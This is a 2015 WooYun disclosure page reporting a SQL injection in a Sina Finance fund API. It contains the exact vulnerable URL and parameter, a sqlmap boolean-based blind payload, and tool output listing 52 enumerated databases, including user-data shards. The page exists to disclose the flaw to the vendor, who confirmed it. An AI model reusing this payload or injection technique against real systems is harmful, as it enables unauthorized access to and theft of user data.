当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162049

漏洞标题:新浪财经某处存在SQL注入三

相关厂商:新浪

漏洞作者: 小邪

提交时间:2015-12-17 11:12

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-17: 细节已通知厂商并且等待厂商处理中
2015-12-17: 厂商已经确认,细节仅向厂商公开
2015-12-27: 细节向核心白帽子及相关领域专家公开
2016-01-06: 细节向普通白帽子公开
2016-01-16: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

涉及52个库 影响大量用户数据

详细说明:

注入点:http://vip.stock.finance.sina.com.cn/fund_center/api/jsonp.php/funds_yinhe/FundRank_Service.getYHFundInfo?page=1&num=6&sort=year3grade&asc=0&ccode=&type=01*&type3=&date=&%5Bobject%20HTMLDivElement%5D=o9kgo
参数type存在注入

漏洞证明:

Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: http://vip.stock.finance.sina.com.cn:80/fund_center/data/jsonp.php/funds_smsy/PEFundService.getHowBuyData?page=1&num=10&sort=(SELECT (CASE WHEN (6998=6998) THEN 6998 ELSE 6998*(SELECT 6998 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&asc=0&ccode=&date=&month=
---
[20:28:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[20:28:10] [INFO] fetching database names
[20:28:10] [INFO] fetching number of databases
[20:28:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:28:10] [INFO] retrieved: 52
[20:28:10] [INFO] retrieved: information_schema
[20:28:25] [INFO] retrieved: dealcollection
[20:28:34] [INFO] retrieved: finance_user_0
[20:28:42] [INFO] retrieved: finance_user_1
[20:28:49] [INFO] retrieved: finance_user_10
[20:28:57] [INFO] retrieved: finance_user_11
[20:29:05] [INFO] retrieved: finance_user_12
[20:29:12] [INFO] retrieved: finance_user_13
[20:29:25] [INFO] retrieved: finance_user_14
[20:29:33] [INFO] retrieved: finance_user_15
[20:29:43] [INFO] retrieved: finance_user_16
[20:29:51] [INFO] retrieved: finance_user_17
[20:30:05] [INFO] retrieved: finance_user_18
[20:30:12] [INFO] retrieved: finance_user_19
[20:30:21] [INFO] retrieved: finance_user_2
[20:30:28] [INFO] retrieved: finance_user_20
[20:30:38] [INFO] retrieved: finance_user_21
[20:30:47] [INFO] retrieved: finance_user_22
[20:30:57] [INFO] retrieved: finance_user_23
[20:31:07] [INFO] retrieved: finance_user_24
[20:31:17] [INFO] retrieved: finance_user_25
[20:31:24] [INFO] retrieved: finance_user_26
[20:31:32] [INFO] retrieved: finance_user_27
[20:31:39] [INFO] retrieved: finance_user_28
[20:31:47] [INFO] retrieved: finance_user_29
[20:31:55] [INFO] retrieved: finance_user_3
[20:32:07] [INFO] retrieved: finance_user_30
[20:32:15] [INFO] retrieved: finance_user_31
[20:32:23] [INFO] retrieved: finance_user_32
[20:32:33] [INFO] retrieved: finance_user_33
[20:32:41] [INFO] retrieved: finance_user_34
[20:32:51] [INFO] retrieved: finance_user_35
[20:33:00] [INFO] retrieved: finance_user_4
[20:33:09] [INFO] retrieved: finance_user_5
[20:33:18] [INFO] retrieved: finance_user_6
[20:33:29] [INFO] retrieved: finance_user_7
[20:33:36] [INFO] retrieved: finance_user_8
[20:33:45] [INFO] retrieved: finance_user_9
[20:33:53] [INFO] retrieved: hkstock
[20:33:57] [INFO] retrieved: moneyfinance
[20:34:03] [INFO] retrieved: mysql
[20:34:06] [INFO] retrieved: nagiosdmm
[20:34:11] [INFO] retrieved: performance_schema
[20:34:19] [INFO] retrieved: stp_user_0
[20:34:25] [INFO] retrieved: stp_user_1
[20:34:54] [INFO] retrieved: stp_user_2
[20:35:03] [INFO] retrieved: stp_user_3
[20:35:11] [INFO] retrieved: stp_user_4
[20:35:18] [INFO] retrieved: stp_user_5
[20:35:25] [INFO] retrieved: test
[20:35:27] [INFO] retrieved: xddmm
[20:35:31] [INFO] retrieved: zjmdmm
available databases [52]:
[*] dealcollection
[*] finance_user_0
[*] finance_user_1
[*] finance_user_10
[*] finance_user_11
[*] finance_user_12
[*] finance_user_13
[*] finance_user_14
[*] finance_user_15
[*] finance_user_16
[*] finance_user_17
[*] finance_user_18
[*] finance_user_19
[*] finance_user_2
[*] finance_user_20
[*] finance_user_21
[*] finance_user_22
[*] finance_user_23
[*] finance_user_24
[*] finance_user_25
[*] finance_user_26
[*] finance_user_27
[*] finance_user_28
[*] finance_user_29
[*] finance_user_3
[*] finance_user_30
[*] finance_user_31
[*] finance_user_32
[*] finance_user_33
[*] finance_user_34
[*] finance_user_35
[*] finance_user_4
[*] finance_user_5
[*] finance_user_6
[*] finance_user_7
[*] finance_user_8
[*] finance_user_9
[*] hkstock
[*] information_schema
[*] moneyfinance
[*] mysql
[*] nagiosdmm
[*] performance_schema
[*] stp_user_0
[*] stp_user_1
[*] stp_user_2
[*] stp_user_3
[*] stp_user_4
[*] stp_user_5
[*] test
[*] xddmm
[*] zjmdmm

修复方案:

你懂的

版权声明:转载请注明来源 小邪@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-17 14:55

厂商回复:

g感谢支持

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-22 18:03 | 土夫子 ( 普通白帽子 | Rank:453 漏洞数:80 | 看似山穷水尽,终将柳暗花明)

    神器拿来